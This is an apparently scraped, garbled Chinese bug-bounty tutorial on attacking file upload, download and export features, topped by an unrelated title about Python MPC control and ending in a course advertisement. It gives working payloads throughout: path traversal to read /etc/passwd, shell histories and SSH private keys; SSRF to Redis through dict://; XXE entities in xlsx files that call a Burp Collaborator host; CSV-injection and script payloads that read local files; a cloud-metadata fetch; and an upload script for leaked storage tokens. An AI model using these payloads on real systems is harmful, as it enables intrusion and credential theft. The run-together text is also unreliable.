核心内容摘要
新手必看:如何用Python实现MPC模型预测控制(附车辆轨迹跟踪代码)
【SRC】从任意文件上传bypass到SSRF内网突破从任意文件上传bypass到SSRF内网突破下载读取文件可疑ID遍历/注入下载接口出现铭感信息的(自己独有的东西)有用户的汇集的地方就很可能存在漏洞出现数字ID遍历,越权下载其他人文件,GETPOST皆切换尝试,利用IDOR越权,但是有鉴权字段就无效了userId19230239023923232 NickName 232193299321324343 orderid1989885454549549注入思考是**1 -1**,观察数值有没有被带入执行,可以是选择性数字的导入/下载数字是否带入数据库查询思路文章导出Excle功能点,输入1的时候表示导出第一列数据此处包长为6360在我输入2的时候表示导出前2列数据此时包长为6364当我输入xxx?id
时此时导出的是开始第一列1列数据包长为6360了这就很明显的用户可以操控拼接进SQL语句进行正则运算,所以遇到文件id 测试遍历及注入有时候也会有意想不到的惊喜假设原本的 SQL 查询语句为 SELECT column_name FROM table_name WHERE id 用户输入的id;探测到注入无过滤情况就可以构造恒真条件永远为真导致查询返回所有记录从而绕过了原本的查询条件获取了所有列的数据,假设存在过滤条件就慢慢探测了只能靠个人思路绕过如果用户输入的 id 是 1 OR 11那么拼接后的 SQL 查询语句会变成 SELECT column_name FROM table_name WHERE id 1 OR 11;file参数下载接口任意读取读取文件功能点接口,按照读取的文件id返回对应的文件,字段filexxxx,同上文不同的是虽然功能也是为文件相关,但相关字段并不是idfileidinode这种明确表示依靠文件id输出文件的,而是file表示文件相关字段,此类场景不仅仅可以测试注入、越权、遍历、还可以测试任意文件读取,类似的参数还有filesname file files, 不外乎功能点,只能接口字段出现此类就可以测试,只是这种漏洞出现在操作文件读取下载场景较多,下面会介绍到利用伪协议读取场景file189839434343 //可以尝试读取 file../../ect/passwd列如apis/xxxxxxx/download?filePath接口于是便可以尝试任意文件读取成功下载etc/passwd整理好通用字典,形成自己的测试规范,遇到好的绕过Payload做好记录,图片链接http://file/
png图片的链接形式是http://file//xxxxx.png可以测试成file//etc/passwd或者只保留http://file对路径无处理可能会列出该目录下所有的文件http://file//a0b24dbc24f3d24530999e10e11a88c7242338c0a849d91aa0ee47369cd2b6147f.png http://file// etc/passwd http://file//type类型任意文件读取接口中出现type类型参数时,尝试读取文件,最不起眼的参数也可能隐藏着重大的安全风险,设计要文件相关的参数都需要铭感起来filenameGET /api/saber?typexxxxx GET /api/saber?type../../../../../../etc/passwd400状态码任意读取推特国外大牛挖掘遇到的情况,在路径上进行路径遍历,本以为参数带入才可以路径遍历,有时候骚的思路路径就是参数,响应包为400试试看路径遍历payload: ///////./././././etc/passwd文件包含任意文件读取区别文件包含会包含文件然后输出,任意文件读取只能读取文件包含和任意文件读取都支持伪协议还有远程地址,但是文件包含一般会有漏洞文件的前缀http://baidu.com/ saber.php ?name../../../../Windows./system.ini saber.php ?php $file$_GET[name]; include($file); ?根据功能点分析这个地方会是SSRF还是任意文件读取,请求网络功能如下必须测试DNSloghttp://baidu.com/saber?filehtttp:sxxxxx无响应办法就测试任意文件读取file协议,能读文件了就可以读其他记录IP的铭感文件,需要注意权限的问题权限决定我们能读取/下载文件范围,尝试读取root/.bash_history看自己是否有root权限,此文件只能是root用户读取它包含了root用户操作命令的记录如果没有,只能按部就班的利用…/来逐层跳转读取# etc/passwd记录了系统所有用户信息 http://baidu.com/saber?filefile://etc/passwd # /etc/shadow 是用于存储用户账户密码等安全相关信息的文件 只有root用户才能读不带协议文件包含理解http://xxxx/saber?nameetc/passwd与http://xxxxx/saber?namefile://etc/passwd之间的差异任意文件读取攻防利用思路参考文章https://mp.weixin.qq.com/s/7prdLc9ml6q2chrRxdsdEQhttps://mp.weixin.qq.com/s/PdFm_Y3FNDkCMrsHXcm_2whttps://mp.weixin.qq.com/s/Zkw68UPDWcHBn6cayVdITg拿到任意读取漏洞思路先读取管理员root用户.bash_history命令记录 ,看自己是否有root权限,此文件只能是root用户读取它包含了root用户操作命令的记录读取此用户的登录私钥包括历史记录记录如果用户配置了可以通过密钥登录那么读取私匙到本地 也可以完成 登录,私匙验证的东西远程下载下来,然后可以直接拿私匙到自己电脑上去远程登录对方ssh/root/.bash_history # 读取root用户历史命令可能会出现ssh私钥存储位置或其他铭感文件路径 /proc/self/status # 当前用户运行进程状态无法读取管理员.bash_history,尝试读取/proc/self/status进程的uid和gid判断 当前用户权限后读取/etc/password的内容对比进程知道自己是什么用户,此文本会显示系统所有的用户,搜索home /bin/zsh就是实际存在且可以登录系统的用户以及root用户攻防中首先尝试身份去读取/root/.bash_history,获取管理员的历史命令记录,如果读取不了代表当前并没有root权限,则寻找其他可登录的用户,以它的身份去读取文件/home/saber/.zsh_history # 读取saber用户历史命令可能会出现ssh私钥存储位置 /hoem/saber/.ssh/id_rsa # 尝试读取普通用户默认私钥 /root/saber/.ssh/id_rsa root用户默认地址 /root/.ssh/id_rsa # root 默认地址file读取机器文件获得内网IPLinux系统/etc/hosts 包含了主机名与 IP 地址的映射关系可能会记录内网 IP 信息 /etc/network/interfaces 存储网络接口的配置信息其中可能包含内网 IP 地址 /proc/net/fib_trie 包含了路由表信息从中可以获取到内网 IP 地址 ~/.ssh/id_rsa Linux系统中用户的SSH 私钥默认位置Windows系统类似于 Linux 系统的/etc/hosts文件存储了主机名与 IP 地址的映射关系 C:\Windows\System32\drivers\etc\hosts常见中间件日志路径/var/log/apache2/access.log /var/log/apache/access.log /var/log/apache2/error.log /var/log/apache/error.log /usr/local/apache/log/error_log /usr/local/apache2/log/error_log /var/log/nginx/access.log /var/log/nginx/error.log /var/log/httpd/error_logdicr协议探测内网端口读取到IP就可以这样这样爆破操作国光SSRF靶场探测内网如果读取到IP端口并且未授权就连接Redisdict这个协议也可以操作Redis执命令dict://127/
0.
1:6379/info/ # SSR伪造协议读取redis信息 cat /etc/hosts #读取网络信息读取或包含Redis密码记录网站存在文件包含可以 读取redis配置文件信息,或者是其他的Spring boot heapdump等上传文件图片路径可控覆盖文件 / 上传后无路径一个点可以任意读取,通过读取/home/user/.bash_history历史命令得到网址的目录地址,然后跨目录传参考文章判断是否可控文件路径和文件名可控指我们选择图片上传在请求包中/响应包就会显示出路径我们修改路径或者文件名为自己可控的再次发送如果成功路径代表可控**路径可控,**那么可以控制整个网站的目录尝试覆盖网站下存放的东西在前端是可以知道的上传相同的路径相同的文件名不就可以实现覆盖了嘛)
路径可控尝试覆盖,上传2次同一目录下不同的图片,用浏览器打开最后图片是否一致,是则无用 否则是漏洞
再次上传测试../跨目录上传实现目录穿越此处是上传功能,上传的参数为type,正常上传后发现响应包回显的路径是这样,路径回显了等于请求包控制了响应包的上传,POST /demo/upload?type
jsp // 请求包路径 /demo/upload/home/type/
jsp // 响应 包路径猜测type参数就是文件夹名,如果 更改为其他的就会上传到其他位置去,使用…/实现跨目录上传思路就是寻找系统的web路径直接上传脚本getshellPOST /demo/upload?saber
jsp // 请求包路径 /demo/upload/home/saber/
jsp // 响应包路径上传不可知路径
查看下载文件地方,下载时抓包对路径推敲
F12 找网站images 文件夹下是否存在路径
选择图片右键新标签打开,查看此图片对应的图片路径路径推测方法如果响应包回显了路径可以删掉第一层然后拼接响应的目录,上传文件靶场都是这样的形式一般单独上传后的目录都是会在这一层目录下比如https://baidu.com/demo/uploa/上传回显如果是saber/
txt或是
txt 直接拼接在后面就行,会去掉原有 一层 看很多都是这样的https://baidu.com/demp/saber/
txt https://baidu.com/demp/
txtOSS阿里云验证文件上传到OSS服务器过程中的三种经典验证方式
在客户端通过JavaScript代码完成签名然后通过表单直传数据到OSS // 硬编码在JS中
在服务端完成签名然后通过表单直传数据到OSS
在服务端完成签名并且服务端设置了上传后回调然后通过表单直传数据到OSS OSS回调完成后再将应用服务器响应结果返回给客户端前提未上云且可以预览不然不满足正常的文件上传,涉及到了云存储桶攻防,任何情况下都不可以企图直接以图片后缀.jps/.png/.gif/.jepg命名文件并上传这类文件里即使包含html代码或者js代码其代码也不会被任何浏览器解析的任意上传不限制类型上传任意后缀文件都不解析,尝试上传.HTML文件写入XSS,或上传异常后缀的文件,写入HTML代码是很有可能得到存储XSS任意上传尝试htaccess文件 导致RCE任意文件上传/类型解析https://mp.weixin.qq.com/s/MEodN2cUG55rOnBMz48LqA阿里云任意文件上传的时候先判断文件的路径和文件名是否可控接着去同厂商的其他网站查找静态图片或文件看是否可以相互转换实现任意文件覆盖上传图片任意上传html asp php的文件,如路径可控进行路径穿越
png ---
php-----
html.... static/img/img1: 存放静态资源图片等信息的服务器不做解析情况不做解析我们修改文件类型Content-Type为我们想要的,上传的文件是HTML PDF SVG格式 不解析但是可以预览,或许是因为这个类型没有改变,把它的东西全部作为图片去解析了,尝试更改类型(此操作情况是上传的文件支持预览操作而不是访问后直接下载,这样才有危害)Content-Type: image/jpeg // 正常图片类型 -------------------------------------------------------- Content-Type: text/html // HTML文档类型上传.html修改 Content-Type: application/pdf // PDF文件格式 Content-Type: application/x-httpd-php // PHP格式 Content-Type: application/jsp // JSP格式 Content-Type: application/xml // XML格式上传后缀名还是.jpg但文件类型改为html上传成功可能会图片后缀解析htmlpayloadContent-Disposition: form-data; namefile; filename
png Content-Type: text/html scriptalert(
/script上传泄露bucket桶覆盖文件STStoken覆盖文件导入或者上传的功能点,也是上传过后响应包返回了如下数据,如不知道桶名只能源码慢慢审查,判断是哪个云厂商然后找平台文档找脚本进行应用填入对应的值,还是需要一个包一个包的找泄露Bucket 桶名 tmp_secret_key tmp_tokene ------- secret_id secret_key根据文档脚本进行上传文件操作,上传的文件是在根目录下,按理通过脚本填入对应的值,任意上传文件至网站根目录,如知晓 网站其他路径上传即可实现覆盖操作.body为上传的内容// 上传脚本执行需要Py为
0版本下 from qcloud_cos import CosConfig from qcloud_cos import CosS3Client import sys import logging # 配置日志输出 logging.basicConfig(levellogging.INFO, streamsys.stdout) # 填入你的密钥、ID、区域等信息 secrets_key your_secret_key secrets_id your_secret_id region your_region token scheme https # 配置CosConfig config CosConfig(Regionregion, SecretIdsecrets_id, SecretKeysecrets_key, Tokentoken, Schemescheme) # 创建CosS3Client client CosS3Client(config) # 上传文件到指定存储桶 response client.put_object( Bucketyour_bucket_name, # 存储桶名称 Keya.txt, # 上传文件名称 BodyHello, World! # 文件内容 )上传Excle文件XXE利用Excle打XXEhttps://mp.weixin.qq.com/s/kbLLEfdHHOXbuPor-vVPkw创建XlSX利用压缩软件打开在,解压到桌面 在xl/workbook.xml路径下打开文件加入Payload,以下内容插入第2行和第3行SYSTEM后面自己添加相对应的dns记录均可可以是BP可以是DNS.log!DOCTYPE x [ !ENTITY xxe SYSTEM http://bq5z980jwrrniaf9ox35q5fyppvgj
burpcollaborator.net/ ] xxxe;/x加入Paylaod保存是现在是文件夹的形式压缩为zip然后手动改后缀为xlsx,是两步 然后就弄好了恶意文件,切换地址就行了有回显切换伪协议读取文件?xml version
0?!DOCTYPE root [!ENTITY test SYSTEM file:///etc/passwd]roottest;/roots它在任何场景下都只有一种Payload,产生的地方有docx文档或xlsx指的是把xxe语句写在这些文件里面去上传访问)文件导致SSRF或本地文件读取 现在的功能点直接支持插入XXE语句的非常少常见的XML传参的数据包?xm; version
0 encodingUTF-8? stockCheck productid 2 /productid storeid 1 /storeid stockCheck在语句之间插入PayloadPayload: !D0CTYPE foo [!ENTITY % xxe system YOUR-DTO-URL %xxe;] ----------------------------------------- ?xm; version
0 encodingUTF-8? // 写入 dns.log 地址 !D0CTYPE foo [!ENTITY % xxe system https:baidu.com %xxe;] stockCheck productid 2 /productid storeid 1 /storeid stockCheck上传压缩软链接任意读取文件https://mp.weixin.qq.com/s/w5opQqZWyCR4-V7sl5sQpg功能点是上传压缩包,压缩包读取里面的文件内容返回,利用这个点我们要构造它读取的文件内容是否可以重定向到其他的位置,思路还是很好的实战场景较少可以作为拓展点
故意上传报错信息暴露出上传后的位置
对此路径进行构造,压缩包内的文件内容为软链接重定义到指定的路径位置
上传后系统读取这个文件 读取到软链接后就重定向到指定的问题造成任意文件读取上传头像/图片img可控CSRF退出头像上传处抓包,请求包的img可控的话代表我们可以自己构造http请求;可控头像用的是外面的链接,我们抓取退出网站的请求CSRF,发送后成功添加,我们的头像就是一个代码链接,别人看到了就会加载访问.退出网站
头像抓包确认出现img可控
抓取网站退出请求get作为CSRF
再次上传头像/图片 替换img标签内的链接为退出
放包查看效果上传302跳转未授权绕过401当我们未授权上传文件(此处未授权不清楚是正常功能点还是说寻找参数构造的上传),如果响应包没有返回401状态码且进行了302跳转原理是中间件做了统一路由处理重定向到登录地址或某一处利用利用资源文件后缀绕过此类的限制,加入.png.jpg文件name重命名RCE当上传一个文件的时候如果有参数可以更改文件名出现两个文件名参数可能调用cmd命令rename案例中执行了ping命令 但是感觉好少啊这个情况还能这样RCE修改其中的一个文件名后面利用RCE的绕过|执行PING图片大小参数可控制上传图片width height参数可控的话,通过修改图片大小数值让服务器分配资源增加具有拒绝服务攻击的安全隐患。
使用Image Size lssues插件进行检测算是捡烂吧,观察响应包的自己数量判断越权/遍历上传上传某些东西,头像文件,上传后如果发现存在数字,尝试修改ID越权给他人上传,甚至是遍历fileid它人的上传信息,上传后文件名如第二种可能此文件是系统经过重命名的重命名的方式一般采用当前上传的时间戳或者当前上传的日期加随机字段这种情况下枚举较为困难https://www.xxx.com/user1/userfile.php?fileid10001 https://www.ccc.com/user1/userfile.php?fileiduser1_name.jpg导出文件CSV注入其实此漏洞大多数SRC不会收取,因为危害大小完全是人为控制的,导出的xlsx没有被触发那么就一定没有效果,只能做到钓鱼的效果,但学习一下不是坏事,在不限制漏洞类型的众测中还是可以捡到钱的大部分人忽略了这个问题CSV注入详解-先知社区1cmd|/C calc!A0 # 弹出计算机PDF导出SSRF内网网页导出表格或者html文档为PDP或者图片JPG,只要抓包存在https以先测试H1标签.如果导出的PDF出现了标签代表解析HTML标签使用iframe标签新开窗测试解析DNS,只要对外发出请求了DNS收到响应,那么代码里面再嵌入内网地址读取也是SSRF再尝试file协议读取文件https://mp.weixin.qq.com/s/ZfyJgZbuw58qK7TjjKEdmg相关组件及业务场景尝试从PDF导出到SSRF导出PDF文件或者其他文件内容可控解析HTML导出场景出现代码手动插入payload,插入后等待DNS响应,响应成功代表是有SSRF请求了,再利用伪协议读取文件img srchttps://cdn.nlark.com/yuque/0/2025/svg/22621815/
d
b00-f0932cd61bf
svg / # file协议读文件 iframe srcfile:///etc/passwd width400height400/完整的攻击文章,从导出探测到可控之后尝试读取内网再读取内网文件,但亮点是正常是通过iframe标签但这里使用的JS代码读取,之后读取的文件内容会导出到PDFXSS到任意文件读取导出PDF通过请求file协议读取文件,javascript将在服务器端执行通过注入以下 代码从文件系统进行文件的读取script xnew XMLHttpRequest; x.onloadfunction(){ document.write(this.responseText) }; x.open(GET,file:///etc/passwd); x.send(); /script绕过当一些特殊标签比如 ,等被禁用后我们可以使用0秒刷新请求元数据绕过方式看不懂这个方式,不过也是插入下面的语句到导出的功能,之后的PDF就会带出内网信息meta http-equivrefresh content0;urlhttp://metadata.tencentyun.com/latest/meta-data /未授权导出CSRF邮箱接收功能点导出信息会被发送到指定的邮箱进行接收,邮箱发送地址可控,导出文件也会有数据包链接,如果导出没有校验,我们把导出的请求做成CSRF给受害者,地址为攻击者,这样受害者在登录状态下点击执行了导出的请求,那么个人就发送到攻击者的邮箱上,拓展想一下的话并不是导出这个地方可以,比如邀请、发送、铭感信息的交互给第三方,无Token鉴权功能都可以尝试CSRF打出组合的效果导出置空参数公众号学习到的思路也是采取了模糊查询手法,涉及到用户场景都可以尝试置空或%往往会有意想不到的效果,学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。
知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。
广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。
实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。
内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。
通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。